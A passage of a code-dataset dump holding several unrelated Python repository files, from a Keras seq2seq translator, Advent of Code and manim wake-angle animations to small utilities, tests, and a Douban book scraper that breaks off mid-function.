length of hidden and\n cell vector) and initial state of\n decoder LSTM.\n Returns:\n Uncompiled model of encoder/decoder LSTM with embedding layer.\n \"\"\"\n # cache language info from Language() objects\n featureVocabSize = featureLanguageObj.vocabSize\n targetVocabSize = targetLanguageObj.vocabSize\n ## encoder architecture ##\n # encoder takes scalar id of token\n encoder_in = keras.layers.Input(shape=(None,), name='encoder_in')\n # embedding layer builds dense vectors of latentDims from input ids\n encoder_embeddings = keras.layers.Embedding(input_dim=featureVocabSize,\n output_dim=latentDims)(encoder_in)\n encoder_lstm = keras.layers.LSTM(units=latentDims, return_state=True,\n name='encoder_lstm')\n encoder_outputs, hidden_state, cell_state = encoder_lstm(encoder_embeddings)\n # pull just the hidden and cell state from the lstm\n encoder_states = [hidden_state, cell_state]\n ## decoder architecture ##\n # decoder takes scalar id of correct token (teach forcing)\n decoder_in = keras.layers.Input(shape=(None,), name='decoder_in')\n # embedding layer builds dense vectors of latentDims in target language\n decoder_embedding = keras.layers.Embedding(input_dim=targetVocabSize,\n output_dim=latentDims)(decoder_in)\n decoder_lstm = keras.layers.LSTM(units=latentDims, return_sequences=True,\n name='decoder_lstm')\n decoder_outputs = decoder_lstm(decoder_embedding, initial_state=encoder_states)\n # dense layer uses softmax for token prediction across one-hot vectors\n decoder_dense = keras.layers.Dense(units=targetVocabSize,\n activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n # build and return model\n model = keras.models.Model([encoder_in, decoder_in], decoder_outputs)\n return model\n\n\ndef compile_and_train_model(encoderFeatures, decoderFeatures, decoderTargets,\n model, epochs=10, validation_split=0.1,\n outPath=None):\n \"\"\"\n Compiles and trains encoder/decoder model according to hyperparameters and\n saves to outPath of given.\n Args:\n encoderFeatures: Matrix of features for encoder training\n decoderFeatures: Matrix of features for decoder teaching\n deocderTargets: Matrix of targets for decoder training\n model: Uncompiled encoder/decoder model\n epochs: Number of epochs for which to train\n validation_split: Train/test split for model validation\n outPath: Path to which to save the model\n \"\"\"\n # compile the model\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n # train the model on input data\n model.fit([encoderFeatures, decoderFeatures], decoderTargets,\n epochs=epochs, validation_split=validation_split)\n if outPath:\n model.save(outPath)\n return model\n\n\n# gather the data from file\n(englishObj,\n frenchObj,\n featureWords,\n targetWords\n) = build_language_objects(filePath=FRENCH_PATH, featureLanguage='english',\n targetLanguage='french', returnTrainData=True)\n# encode the data\n(encoderFeatures,\n decoderFeatures,\n decoderTargets\n) = id_encode_training_data(featureWords=featureWords, targetWords=targetWords,\n featureLanguageObj=englishObj,\n targetLanguageObj=frenchObj)\n\n# build encoder/decoder model\nmodel = build_embedding_encoder_decoder(featureLanguageObj=englishObj,\n targetLanguageObj=frenchObj)\nprint(model.summary())\n# train model\ntrainedModel = compile_and_train_model(encoderFeatures,\n decoderFeatures,\n decoderTargets,\n model,\n epochs=100,\n outPath='encoderDecoderModel.sav')\n\n\n# import keras\n#\n# trainedModel = keras.models.load_model('encoderDecoderModel.sav')\n# 
print(trainedModel.summary())\n#\n# ## Sampling ##\n# encoder_model = keras.models.Model(encoder_in, encoder_states)\n#\n# decoder_state_input_h = keras.layers.Input(shape=(latentDims,))\n# decoder_state_input_c = keras.layers.Input(shape=(latentDims,))\n# decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n# decoder_outputs, state_h, state_c = decoder_lstm(decoder_in, initial_state=decoder_states_inputs)\n# decoder_states = [state_h, state_c]\n# decoder_outputs = decoder_dense(decoder_outputs)\n# decoder_model = keras.models.Model(\n# [decoder_in] + decoder_states_inputs,\n# [decoder_outputs] + decoder_states)\n#\n#\n# def decode_sequence(input_seq):\n# # Encode the input as state vectors.\n# states_value = encoder_model.predict(np.expand_dims(input_seq, axis=0))[0]\n#\n# # Generate empty target sequence of length 1.\n# target_seq = np.zeros((1, 1, frenchObj.vocabSize))\n# # Populate the first character of target sequence with the start character.\n# target_seq[0, 0, frenchObj.idxDict['START']] = 1.\n#\n# # Sampling loop for a batch of sequences\n# # (to simplify, here we assume a batch of size 1).\n# stop_condition = False\n# decoded_sentence = ''\n# while not stop_condition:\n# output_tokens, h, c = decoder_model.predict(\n# target_seq + states_value)\n#\n# # Sample a token\n# sampled_token_index = np.argmax(output_tokens[0, -1, :])\n# sampled_char = frenchObj.reverseIdx[sampled_token_index]\n# decoded_sentence += sampled_char\n#\n# # Exit condition: either hit max length\n# # or find stop character.\n# if (sampled_char == 'END' or\n# len(decoded_sentence) > frenchObj.maxSentLen):\n# stop_condition = True\n#\n# # Update the target sequence (of length 1).\n# target_seq = np.zeros((1, 1, frenchObj.vocabSize))\n# target_seq[0, 0, sampled_token_index] = 1.\n#\n# # Update states\n# states_value = [h, c]\n#\n# return decoded_sentence\n#\n#\n# while True:\n# text = input('Text: ')\n# input_seq = encode_sentence(text, englishObj)\n# decoded_sentence = decode_sequence(input_seq)\n# print('Decoded sentence:', decoded_sentence)\n","repo_name":"landjbs/Translation","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":27520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11963660548","text":"import turtle\n\ncanvas = turtle.Screen()\npen = turtle.Turtle()\n\n# basic commands\ndef polygon(side, size):\n for _ in range(side):\n pen.forward(size)\n pen.left(float(360/side))\n\npen.color('red')\n\npen.begin_fill()\npolygon(7, 100)\n\npen.end_fill()\n\nturtle.done()\n\n\n","repo_name":"ava6969/CS101","sub_path":"AndrewLesson5.py","file_name":"AndrewLesson5.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43495030771","text":"\nfrom typing import List, Set\nfrom utils import AdventSession, extract_year_day_from_path\n\nsession = AdventSession(**extract_year_day_from_path(__file__))\n\nclass Chip(int):\n pass\n\nclass Output:\n all_outputs = dict()\n def __init__(self, n: int) -> None:\n self.n = n\n self.__class__.all_outputs[n] = self\n \n def add_chip(self, chip: Chip):\n self.chip = chip\n \n def __repr__(self) -> str:\n return f'Output {self.n} has chip {self.chip}'\n\nclass Bot:\n all_bots = dict()\n def __init__(self, n) -> None:\n self.n = n\n self.chips = []\n \n self.__class__.all_bots[n] = self\n self.logic = {\n 'low': None,\n 'high': None,\n }\n \n def __repr__(self) -> 
str:\n return f'Bot {self.n} has {self.chips}'\n def add_chip(self, chip: Chip):\n self.chips.append(chip)\n if len(self.chips) == 2:\n low, high = sorted(self.chips)\n \n\n if self.logic['low']:\n result = self.logic['low'].add_chip(low)\n if result:\n return result\n self.chips.remove(low)\n if self.logic['high']:\n result = self.logic['high'].add_chip(high)\n if result:\n return result\n self.chips.remove(high)\n \n if low == Chip(17) and high == Chip(61):\n return self\n def __hash__(self) -> int:\n return hash(self.n)\n \n @classmethod\n def add_bot_if_not_exist(cls, bot_n: int):\n if bot_n in cls.all_bots:\n return cls.all_bots[bot_n]\n bot = Bot(bot_n)\n cls.all_bots[bot_n] = bot\n return bot\n \n \ndef parse_bot_logic(rule: str):\n bot_, bot_n, give, low, to, bot_output, low_b, *_, bot_output2, high_b = rule.split()\n bot = Bot.add_bot_if_not_exist(int(bot_n))\n \n if bot_output == 'bot':\n low_bot = Bot.add_bot_if_not_exist(int(low_b))\n bot.logic['low'] = low_bot\n elif bot_output == 'output':\n bot.logic['low'] = Output(int(low_b))\n else:\n raise Exception(f'wrong bot output string {bot_output}')\n \n if bot_output2 == 'bot':\n high_bot = Bot.add_bot_if_not_exist(int(high_b))\n bot.logic['high'] = high_bot\n elif bot_output2 == 'output':\n bot.logic['high'] = Output(int(high_b))\n else:\n raise Exception(f'wrong bot2 output string {bot_output2}')\n \n \n \ndef parse_bot_chip_value(rule: str):\n value, chip_v, goes, to, bot_, bot_n = rule.split()\n bot = Bot.add_bot_if_not_exist(int(bot_n))\n return bot.add_chip(Chip(chip_v))\n\n\n@session.submit_result(level=1, tests=[({'inp': {\n 'value 75 goes to bot 2',\n 'bot 2 gives low to bot 1 and high to bot 0',\n 'value 17 goes to bot 1',\n 'bot 1 gives low to output 1 and high to bot 0',\n 'bot 0 gives low to output 2 and high to output 0',\n 'value 61 goes to bot 2',\n}}, 1)])\ndef solve_part1(inp: Set[str]):\n bot_logics = {logic for logic in inp if logic.startswith('bot')}\n [parse_bot_logic(logic) for logic in bot_logics]\n \n bot_values = inp-bot_logics\n for bot_value in bot_values:\n answer_bot = parse_bot_chip_value(bot_value)\n if answer_bot is not None:\n return answer_bot.n\n\n \n@session.submit_result(level=2, tests=[({'inp': {\n 'value 5 goes to bot 2',\n 'bot 2 gives low to bot 1 and high to bot 0',\n 'value 3 goes to bot 1',\n 'bot 1 gives low to output 1 and high to bot 0',\n 'bot 0 gives low to output 2 and high to output 0',\n 'value 2 goes to bot 2',\n}}, 30)])\ndef solve_part2(inp: Set[str]):\n bot_logics = {logic for logic in inp if logic.startswith('bot')}\n [parse_bot_logic(logic) for logic in bot_logics]\n [parse_bot_chip_value(value) for value in inp - bot_logics]\n return Output.all_outputs[0].chip * Output.all_outputs[1].chip * Output.all_outputs[2].chip\n\n\nif __name__ == '__main__':\n inp = {i for i in session.read_input().split('\\n') if i}\n \n solve_part1(inp)\n \n solve_part2(inp)\n","repo_name":"light-le/AdventOfCode","sub_path":"2016/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20461625946","text":"#!/usr/bin/env python\n\nimport csv\nimport re\nimport sys\nimport pandas as pd\n\nif sys.version[0] == '2':\n\treload(sys)\n\tsys.setdefaultencoding(\"utf-8\")\n\nif (len(sys.argv) < 2):\n\tprint('''Invalid file path!\n\t\tUsage: xls2csv /path/to/xls_file # for command line output\n\t\tUsage: xls2csv /path/to/xls_file /path/to/csv_file # for writing in a csv 
file\n\t''')\n\tsys.exit(1)\n\nargv_len = len(sys.argv)\nworkbook = pd.read_excel(sys.argv[1], header=None, engine='xlrd') # only for xls\n\nif (argv_len > 2): # if output file is provided\n csv_file = open(sys.argv[2], 'w')\n writer = csv.writer(csv_file)\n\nfor row in workbook.values:\n\tif (argv_len > 2): # if output file is provided\n\t\twriter.writerow(row)\n\telse:\n\t\trow2str = ','.join(str(s) for s in row)\n\t\trow2str = re.sub(r\"00\\:00\\:00|\\s\", '', row2str)\n\t\trow2str = row2str.rstrip('.')\n\t\tprint(row2str)\n\nsys.exit(0)\n","repo_name":"Sosomqk/xlstocsv","sub_path":"xlstocsv.py","file_name":"xlstocsv.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74901946375","text":"# -*- coding: utf8 -*-\nimport unittest\nfrom .weakreflist import WeakList\nimport sys\nis_pypy = \"__pypy__\" in sys.builtin_module_names\n\n\nclass DocExampleTest(unittest.TestCase):\n if not is_pypy:\n def test_example1(self):\n class A(object):\n \"\"\"weakrefs don't function directly on object()\"\"\"\n\n objectA = A()\n my_list = WeakList([objectA])\n assert len(my_list) == 1\n del objectA\n assert len(my_list) == 0 # objectA removed from list\n else:\n def test_example2(self):\n import gc\n\n class A(object):\n \"\"\"weakrefs don't function directly on object()\"\"\"\n\n objectA = A()\n my_list = WeakList([objectA])\n assert len(my_list) == 1\n del objectA\n\n assert len(my_list) == 1 # gc did not run\n gc.collect() # must be called\n assert len(my_list) == 0\n","repo_name":"apieum/weakreflist","sub_path":"weakreflist/testDocExamples.py","file_name":"testDocExamples.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"45"} +{"seq_id":"13238233510","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nfrom configparser import SafeConfigParser\nfrom pies import *\n\ndefault = {'force_to_top': [],\n 'skip': ['__init__.py', ],\n 'line_length': 80,\n 'known_standard_library': ['os', 'sys', 'time', 'copy', 're', '__builtin__', 'thread', 'signal', 'gc',\n 'exceptions', 'email'],\n 'known_third_party': ['google.appengine.api'],\n 'known_first_party': []}\n\ntry:\n with open(os.path.expanduser('~/.isort.cfg')) as config_file:\n config = SafeConfigParser()\n config.readfp(config_file)\n settings = dict(config.items('settings'))\n for key, value in iteritems(settings):\n existing_value_type = type(default.get(key, ''))\n if existing_value_type in (list, tuple):\n default[key.lower()] = value.split(\",\")\n else:\n default[key.lower()] = existing_value_type(value)\nexcept EnvironmentError:\n pass\n","repo_name":"habnabit/isort","sub_path":"isort/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"11780008786","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\n\n# Model - CleverHans Keras MNIST model reimplementation w/ dropout\ndef model_(X, n_classes, tr_mode, reg_weight):\n with slim.arg_scope([slim.conv2d, slim.fully_connected], weights_regularizer=slim.l2_regularizer(reg_weight)):\n with slim.arg_scope([slim.conv2d], rate=(1,1)):\n drop1 = slim.dropout(X, keep_prob=0.8, is_training=tr_mode, scope='dropout1')\n conv1 = slim.conv2d(drop1, 64 * 1, [8, 8], stride=(2,2), padding='SAME', scope='conv1')\n conv2 = 
slim.conv2d(conv1, 64 * 2, [6, 6], stride=(2,2), padding='VALID', scope='conv2')\n conv3 = slim.conv2d(conv2, 64 * 2, [5, 5], stride=(1,1), padding='VALID', scope='conv3')\n drop2 = slim.dropout(conv3, keep_prob=0.5, is_training=tr_mode, scope='dropout2')\n flat = slim.flatten(drop2, scope='flat')\n logits = slim.fully_connected(flat, n_classes, activation_fn=None, scope='fc')\n softmax = tf.nn.softmax(logits, name='softmax')\n return logits, softmax\n\n# model from Appenix A.1:\n# a CNN with three convolutional layers and one fully connected layer,\n# where each convolutional layer is interlaced with ReLU, local\n# contrast normalization, and a pooling layer. For regularization,\n# dropout is used at the last layer, i.e., fully-connected layer, with\n# p = 0.5.\ndef model(X, n_classes, tr_mode, reg_weight):\n with slim.arg_scope([slim.conv2d, slim.fully_connected], weights_regularizer=slim.l2_regularizer(reg_weight)):\n conv1 = slim.conv2d(X, 64 * 1, [8, 8], stride=(2,2), padding='SAME', scope='conv1')\n pool1 = slim.max_pool2d(conv1, [2, 2], scope='pool1')\n conv2 = slim.conv2d(conv1, 64 * 2, [6, 6], stride=(2,2), padding='VALID', scope='conv2')\n pool2 = slim.max_pool2d(conv2, [2, 2], scope='pool2')\n conv3 = slim.conv2d(conv2, 64 * 2, [5, 5], stride=(1,1), padding='VALID', scope='conv3')\n drop = slim.dropout(conv3, keep_prob=0.5, is_training=tr_mode, scope='dropout')\n flat = slim.flatten(drop, scope='flat')\n logits = slim.fully_connected(flat, n_classes, activation_fn=None, scope='fc')\n softmax = tf.nn.softmax(logits, name='softmax')\n return logits, softmax\n","repo_name":"sunblaze-ucb/ensemble-detection-attacks","sub_path":"ensemble-specialists/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"25444904812","text":"from src.superannotate import SAClient\nfrom tests.integration.base import BaseTestCase\n\nsa = SAClient()\n\n\nclass TestProjectRename(BaseTestCase):\n PROJECT_NAME = \"TestProjectRename\"\n NAME_TO_RENAME = \"TestPr\"\n PROJECT_DESCRIPTION = \"Desc\"\n PROJECT_TYPE = \"Vector\"\n NEW_PROJECT_NAME = \"new\"\n REPLACED_PROJECT_NAME = \"_ _ _ _ _ _ _ _ _ _\"\n BAD_PROJECT_NAME = r'/ \\ : * ? 
\" “ < > |' # noqa: w605\n\n def setUp(self, *args, **kwargs):\n self.tearDown()\n self._project = sa.create_project(\n self.PROJECT_NAME, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE\n )\n\n def tearDown(self) -> None:\n projects = []\n projects.extend(sa.search_projects(self.PROJECT_NAME, return_metadata=True))\n projects.extend(sa.search_projects(self.NEW_PROJECT_NAME, return_metadata=True))\n projects.extend(\n sa.search_projects(self.REPLACED_PROJECT_NAME, return_metadata=True)\n )\n projects.extend(sa.search_projects(self.NAME_TO_RENAME, return_metadata=True))\n for project in projects:\n try:\n sa.delete_project(project)\n except Exception as _:\n pass\n\n def test_project_rename(self):\n sa.rename_project(self.PROJECT_NAME, self.NEW_PROJECT_NAME)\n meta = sa.get_project_metadata(self.NEW_PROJECT_NAME)\n self.assertEqual(meta[\"name\"], self.NEW_PROJECT_NAME)\n\n def test_rename_with_special_characters(self):\n sa.rename_project(self.PROJECT_NAME, self.BAD_PROJECT_NAME)\n sa.get_project_metadata(self.REPLACED_PROJECT_NAME)\n\n def test_rename_with_substring_of_an_existing_name(self):\n sa.rename_project(self.PROJECT_NAME, self.NAME_TO_RENAME)\n metadata = sa.get_project_metadata(self.NAME_TO_RENAME)\n self.assertEqual(self.NAME_TO_RENAME, metadata[\"name\"])\n sa.delete_project(self.NAME_TO_RENAME)\n","repo_name":"superannotateai/superannotate-python-sdk","sub_path":"tests/integration/projects/test_project_rename.py","file_name":"test_project_rename.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"45"} +{"seq_id":"38936919859","text":"from manim import *\nfrom colour import Color\n\ng = 9.8\ndef wavelength(k):\n return 2*PI/k\ndef omega(k):\n return np.sqrt(2*PI*k*g)\ndef vph(k):\n return np.sqrt(2*PI/k*g)\ndef vgr(k):\n return np.sqrt(1/2*PI/k*g)\n\n\nclass V(Scene):\n config.background_color = Color(\"#244\")\n\n def construct(self):\n title = Title(\"Angle of the wake\")\n y0 = -2.5\n path = Line([10,y0,0],[-6,y0,0], stroke_color=RED)\n waves = []\n vphdots = []\n vgrdots = []\n for angle in np.arange(0,PI+.01,PI/10):\n waves += Line([6,y0,0],[6*np.cos(angle),y0+6*np.sin(angle),0], stroke_opacity=.5)\n vphdots += Dot([6*np.cos(angle),y0+6*np.sin(angle),0], color=GOLD)\n vgrdots += Dot([3+3*np.cos(angle),y0+3*np.sin(angle),0], color=YELLOW)\n vphdots = VGroup(*vphdots)\n vgrdots = VGroup(*vgrdots)\n\n angle = PI/3\n firstwave = Line([6,y0,0],[6*np.cos(angle),y0+6*np.sin(angle),0], stroke_opacity=.5)\n obsline = Line([-6,y0,0],[6*np.cos(angle),y0+6*np.sin(angle),0])\n\n circle_vph = Arc(radius = 6, arc_center = [0,y0,0], angle = PI, color=GOLD)\n circle_vgr = Arc(radius = 3, arc_center = [3,y0,0], angle = PI, color=YELLOW)\n\n tanline_long = Line([-6,y0,0],[8,y0+14/np.sqrt(8),0], stroke_color=WHITE)\n tanline = Line([-6,y0,0],[3-1,y0+np.sqrt(8),0], stroke_color=WHITE)\n trigline = Line([3,y0,0],[3-1,y0+np.sqrt(8),0], stroke_color=WHITE)\n traceline = Line([3,y0,0],[-6,y0,0], stroke_color=WHITE)\n\n b1 = Brace(traceline, direction=traceline.copy().rotate(PI / 2).get_unit_vector())\n b1text = b1.get_tex(r\"3r\")\n b1gr = VGroup(b1,b1text)\n\n b2 = Brace(trigline, direction=trigline.copy().rotate(-PI / 2).get_unit_vector())\n b2text = b2.get_tex(r\"r\")\n b2gr = VGroup(b2,b2text)\n\n a1 = RightAngle(trigline,tanline_long, quadrant=(-1, -1))\n a2 = Angle(traceline, tanline, quadrant=(-1, 1), radius = 1)\n a2label = MathTex(r\"\\theta\")\n a2label.next_to(a2, RIGHT).shift(.1*UP)\n\n eqpos = 
3*LEFT+UP\n eq1 = MathTex(r\"\\qquad \\sin \\theta =\", r\"\\frac{r}{3r} = \\frac13\", r\"\\phantom{\\approx 19.5^{\\circ}}\").move_to(eqpos)\n eq3 = MathTex(r\"\\theta = \\arcsin\", r\"\\frac{1}{3}\", r\"\\phantom{\\approx 19.5^{\\circ}}\").move_to(eqpos)\n eq4 = MathTex(r\"\\theta = \\arcsin\", r\"\\frac{1}{3}\", r\"\\approx 19.5^{\\circ}\").move_to(eqpos)\n\n self.add(path)\n self.add(circle_vph)\n self.add(firstwave,obsline)\n self.wait(5)\n self.play(FadeOut(obsline,firstwave))\n self.play(Create(VGroup(*waves)), run_time=3)\n self.wait()\n self.play(Create(vphdots), run_time=2)\n self.wait(7)\n self.play( ReplacementTransform(vphdots,vgrdots), run_time=2 )\n self.wait(3)\n self.play(Create(circle_vgr))\n self.wait(5)\n\n self.play(Create(tanline_long))\n self.wait(3)\n self.play(FadeOut(*waves,*vphdots,*vgrdots,circle_vph))\n self.wait()\n self.add(tanline)\n self.play(Create(VGroup(trigline,traceline)),FadeIn(title))\n self.play(FadeOut(tanline_long))\n self.play(FadeIn(a1, a2, a2label, b1gr,b2gr))\n\n self.play(Write(eq1))\n self.wait()\n self.play( ReplacementTransform(eq1,eq3))\n self.play( ReplacementTransform(eq3,eq4))\n self.wait(5)\n\nclass Photo(Scene):\n def construct(self):\n l1 = Line([0,0,0],[-15,15*np.tan(np.arcsin(1/3)),0])\n l2 = Line([0,0,0],[-15,-15*np.tan(np.arcsin(1/3)),0])\n path = Line([-15,0,0],[0,0,0], stroke_color=RED)\n a1 = Angle(l1,path,quadrant=[1,-1], radius=2)\n a1label = MathTex(r\"19.5^\\circ\")\n a1label.rotate(PI - 10*DEGREES).next_to(a1, LEFT).shift(.2*UP)\n vlines = VGroup(l1,path,l2,a1,a1label).rotate(PI).shift(9.5*RIGHT+.2*UP).set_opacity(.5)\n\n self.add(ImageMobject(\"elbe.png\"))\n self.add(vlines)\n\nclass Photo2(Scene):\n def construct(self):\n l1 = Line([0,0,0],[15,15*np.tan(np.arcsin(1/3)),0])\n l2 = Line([0,0,0],[15,-15*np.tan(np.arcsin(1/3)),0])\n path = Line([15,0,0],[0,0,0], stroke_color=RED)\n a1 = Angle(l1,path,quadrant=[1,-1], radius=2, other_angle=True)\n a1label = MathTex(r\"19.5^\\circ\")\n a1label.rotate(PI + 10*DEGREES).next_to(a1, RIGHT).shift(.2*UP)\n vlines = VGroup(l1,path,l2,a1,a1label).rotate(PI).shift(9.3*LEFT+.3*UP)#.set_opacity(.5)\n\n self.add(ImageMobject(\"rotterdam.png\"))\n self.add(vlines)\n\n\n","repo_name":"mvermeeren/SoME2-Wakes","sub_path":"2d-top.py","file_name":"2d-top.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"26097738157","text":"import random\nnumri_random = random.randint(1,10)\n\nnumri_random_string = str(numri_random)\n\nfor i in range (1,10):\n inputi_i_userit = input ('Shkruaj nje numer:')\n if inputi_i_userit == \"\":\n print ('Ju lutem shkruani diqka')\n elif inputi_i_userit != numri_random_string:\n print ('E paskate')\n else:\n print ('Bravo')\n break ","repo_name":"Fidaim1/Python-session1","sub_path":"venv/for_loop_detyra3.py","file_name":"for_loop_detyra3.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7151522155","text":"\nfrom cs1graphics import *\nclass Pyramid(Drawable):\n \"\"\"Represent a bullseye with an arbitrary number of bands.\"\"\"\n\n def __init__(self, numBands, size, primary='black', secondary='white'):\n \"\"\"Create a bullseye object with alternating colors.\n\n The reference point for the bullseye will be its center.\n\n numBands the number of desired bands (must be at least 1)\n radius the total radius for the bullseye (must be positive)\n primary the color 
of the outermost band (default black)\n secondary the color of the secondary band (default white)\n \"\"\"\n if numBands <= 0:\n raise ValueError('Number of bands must be positive')\n if size <= 0:\n raise ValueError('radius must be positive')\n\n Drawable.__init__(self)\n size = 12\n centerX = 6.0\n centerY = (numBands + 1) * size\n width = (numBands + 1) * size\n self._outer = Rectangle(width, size)\n self._outer.setFillColor(primary)\n self._outer.move(centerX, centerY)\n\n if numBands == 1:\n self._rest = None\n else: # create new bullseye with one less band, reduced radius, and inverted colors\n innerR = float(size) * (numBands-1) / numBands\n self._rest = Pyramid(numBands-1, innerR, secondary, primary)\n\n def _draw(self):\n self._beginDraw() # required protocol for Drawable\n self._outer._draw() # draw the circle\n if self._rest:\n self._rest._draw() # recursively draw the rest\n self._completeDraw() # required protocol for Drawable\n \n\npaper = Canvas(400, 400)\nsimple = Pyramid(6, 30)\nsimple.move(65, 80)\npaper.add(simple)\n\nblue = Pyramid(10, 80, 'darkblue', 'skyblue')\npaper.add(blue)\nblue.move(195,120)\n\n\n","repo_name":"Paparoni/algorithm-practice","sub_path":"recur_pyr.py","file_name":"recur_pyr.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"28021478207","text":"import socket\n\ns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\ns.bind((\"0.0.0.0\",5555))\n\nbuff, addr = s.recvfrom(10)\n\nmessage = buff.decode(\"utf-8\")\nprint(\"From \", addr[0], \": \", message)\ncount = 0\nfor letter in message:\n if letter in ['a', 'e', 'i', 'o', 'u']:\n count+=1\n\ns.sendto(count.to_bytes(4, 'little'), addr)\n","repo_name":"alexovidiupopa/Networks","sub_path":"TCP UDP/Test21.10/Servers/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72736613897","text":"from tkinter import *\nroot = Tk()\nroot.geometry(\"900x600\")\nroot.title(\"Sliding text animation\")\ntxt = \"Herokhor\"\n\nindex = 0\ntext =''\nlabel =Label(root,text=txt,font=(\"Arial\",30,'bold'),fg='red')\nlabel.pack(pady=100)\n\ndef slider():\n global index,text\n if index >=len(txt):\n index=-1\n text=''\n label.config(text=text)\n else:\n text = text+txt[index]\n label.config(text=text)\n index+=1\n label.after(100,slider)\nslider()\nroot.mainloop()","repo_name":"PremJibon/text-slider-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7338243208","text":"#coding:utf-8\nimport re\nimport requests\nimport json\nimport os\nfrom bs4 import BeautifulSoup\n\n\ndef get_page_content(url):\n # headers = {\n # 'Referer': ' https: // www.google.com.hk /',\n # 'Upgrade - Insecure - Requests': '1',\n # 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9, image / webp, * / *;q = 0.8',\n # 'Accept - Encoding': 'gzip, deflate, sdch',\n # 'Accept - Language': 'zh - CN, zh;q = 0.8',\n # 'Cache - Control': 'max - age = 0',\n # 'User - Agent': 'Mozilla / 5.0(Windows NT 10.0;WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 51.0.2704.84Safari / 537.36'\n # }\n html = requests.get(url)\n print (html.status_code)\n return html.content\n\ndef get_book_page(home_html_content):\n html = re.findall('class=\\\"nbg\\\" 
href=\\\"(.*?)\\\"',home_html_content)\n return html\n\ndef get_book_info(book_page_content):\n book_info = {'title':\"\",\n 'author':\"\",\n 'press':\"\",\n 'translator':\"\",\n 'ISBN':\"\",\n 'publicationDate':\"\",\n 'pages':\"\",\n 'price':\"\",\n 'briefIntroduction':\"\",\n 'authorIntroduction':\"\"\n }\n try:\n book_info['title'] = re.findall(\"title=\\\"点击看大图\\\" alt=\\\"(.*?)\\\"\",book_page_content)[0]\n except:\n book_info['title'] = re.findall(\"(.*?)(豆瓣)\",book_page_content)[0]\n try:\n book_info['author'] = re.findall(\"(.*?)\",book_page_content)[0]\n except:\n book_info['author'] = None\n try:\n book_info['press'] = re.findall(\"出版社: (.*?)
    \",book_page_content)[0]\n except:\n book_info['press'] = None\n try:\n book_info['translator'] = re.findall(\"(.*?)\",book_page_content)[1]\n except:\n book_info['translator'] = None\n try:\n book_info['ISBN'] = re.findall(\"ISBN:(.*?)
    \",book_page_content)[0]\n except:\n book_info['ISBN'] = None\n try:\n book_info['publicationDate'] = re.findall(\"出版年: (.*?)
    \",book_page_content)[0]\n except:\n book_info['publicationDate'] = None\n try:\n book_info['pages'] = re.findall(\"页数: (.*?)
    \",book_page_content)[0]\n except:\n book_info['pages'] = None\n try:\n book_info['price'] = re.findall(\"定价: (.*?)
    \",book_page_content)[0]\n except:\n book_info['price'] = None\n introduction = re.findall('''
    \n
    (.*?)
    ''',book_page_content)\n if(introduction.__len__() == 2):\n if \"内容简介\" in book_page_content:\n if \"作者简介\" in book_page_content:\n book_info['briefIntroduction'] = introduction[0]\n book_info['authorIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"
    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"
    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n else:\n book_info['briefIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = None\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"
    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n else:\n book_info['authorIntroduction'] = introduction[1]\n book_info['briefIntroduction'] = None\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"
    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n\n elif(introduction.__len__() == 3):\n if '展开全部' in introduction[0] :\n book_info['briefIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = introduction[2]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"
